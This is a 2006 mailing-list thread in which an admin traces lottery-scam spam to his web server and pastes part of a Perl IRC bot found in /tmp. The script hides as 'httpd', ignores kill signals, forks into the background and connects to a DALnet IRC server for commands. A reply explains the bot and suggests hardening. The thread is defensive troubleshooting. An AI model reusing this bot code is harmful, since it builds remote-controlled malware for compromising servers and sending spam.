Postfix Problems
CodeHeads
codeheads at gmail.com
Tue May 23 16:22:29 UTC 2006
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Tue, 23 May 2006 13:11:46 +0100 Paul Howarth <paul at city-fan.org> wrote:
> CodeHeads wrote:
> >> There is something wrong but I cannot nail it down.
> >>
> >> I am receiving hundreds of bounce backs from the web server I am running.
> >> Not sure how they are sending mail. The only mail that should be sent is
> >> from forms. Here is a header of one of queues. Maybe someone has run
> >> into this.
> >>
> >> V8
> >> T1147739033
> >> K1147739138
> >> N1
> >> P34672
> >> Mhost map: lookup (zdnetmail.com): deferred
> >> F8bs
> >> $_apache at localhost
> >> ${daemon_flags}c u
> >> Sapache
> >> Aapache at code-heads.com
> >> rRFC822; galactica7 at zdnetmail.com
> >> RPFD:galactica7 at zdnetmail.com
> >> H?P?Return-Path: <<81>g>
> >> H??Received: (from apache at localhost)
> >> by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
> >> Mon, 15 May 2006 20:23:53 -0400
> >> H?D?Date: Mon, 15 May 2006 20:23:53 -0400
> >> H?x?Full-Name: Apache
> >> H?M?Message-Id: <200605160023.k4G0NrpQ017524 at code-heads.com>
> >> H??To: galactica7 at zdnetmail.com
> >> H??Subject: WINNING NOTIFICATION
> >> H??From: NATIONAL LOTTERY <claimsagent_2006_2007 at yahoo.co.uk>
> >>
> >> What is bothering me is this:
> >> by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;
>
> Right, that should tell you that the mail headers you are looking at
> seem to be generated by something running as user apache (probably a
> CGI/PHP script of some kind running via your web server), which is
> calling the local sendmail on that server to send the mail out. It's
> nothing to do with postfix at all.
>
> > Sorry again, but looky what I found in the /tmp dir:
> > The whole thing is not copy and pasted:
> > #!/usr/bin/perl
> > # r00t teh pl4net! gr33t t0 Myhack at DALnet
> > # ------[eof]-----
> >
> >
> >
> > system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print
> > $1;}'`");
> >
> >
> > my $processo = 'httpd';
> >
> > # morgan the code that you need to rip ends here
> >
> > my @titi = ("Cube-|");
> >
> > my $sleep='5';
> > my $linas_max='4';
> > my @adms=("apaii","KingFighter");
> > my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
> > my @canais=("#conn");
> > my $nick= $titi[rand scalar @titi];
> > my $ircname = $titi[rand scalar @titi];
> > chop (my $realname = $titi[rand scalar @titi]);
> >
> > $servidor='rumble.dal.net' unless $servidor;
> > my $porta='6667';
> > my $VERSAO = '0.5';
> > $SIG{'INT'} = 'IGNORE';
> > $SIG{'HUP'} = 'IGNORE';
> > $SIG{'TERM'} = 'IGNORE';
> > $SIG{'CHLD'} = 'IGNORE';
> > $SIG{'PS'} = 'IGNORE';
> > use IO::Socket;
> > use Socket;
> > use IO::Select;
> > chdir("/");
> > $servidor="$ARGV[0]" if $ARGV[0];
> > $0="$processo"."\0"x16;;
> > my $pid=fork;
> > exit if $pid;
> > die "Problema com o fork: $!" unless defined($pid);
> >
> > our %irc_servers;
> > our %DCC;
> > my $dcc_sel = new IO::Select->new();
> >
> > $sel_cliente = IO::Select->new();
> > sub sendraw {
> > if ($#_ == '1') {
> > my $socket = $_[0];
> > print $socket "$_[1]\n";
> > } else {
> > print $IRC_cur_socket "$_[0]\n";
> > }
> > }
> >
> > sub conectar {
> > my $meunick = $_[0];
> > my $servidor_con = $_[1];
> > my $porta_con = $_[2];
> >
> > my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
> > PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if
> > (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket;
> >
> > What I cannot understand is how someone can upload to the tmp dir. I guess
> > I am still learning. Can someone shed some light on this?
>
> This is communicating with an IRC server, probably to listen for commands.
>
> Look at the owner of the script. If it's apache, you can safely say that
> a webserver exploit was used to upload it. You could try looking at the
> timestamp of the file, and look in your web server log files for
> suspicious activity at around that time to get a clue as to how it got
> there.
>
> If you have /tmp on a separate partition, I'd seriously consider
> mounting it noexec,nodev. If it's not a separate partition, I'd
> seriously consider making one for it on an Internet-exposed web server.
> Same goes for /var.
>
> Paul.
>
That has since been removed and the system re done. I have been keeping an eye
on /tmp and /var/tmp.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)
iD8DBQFEczbFfw3TK8jhZrsRAhN/AKDjZlDh+0bV++6XvBfWHBOVTZdIQQCgoVGJ
Unhz/IKmEViCNj3G+YzEZdk=
=T6xG
-----END PGP SIGNATURE-----
More information about the users
mailing list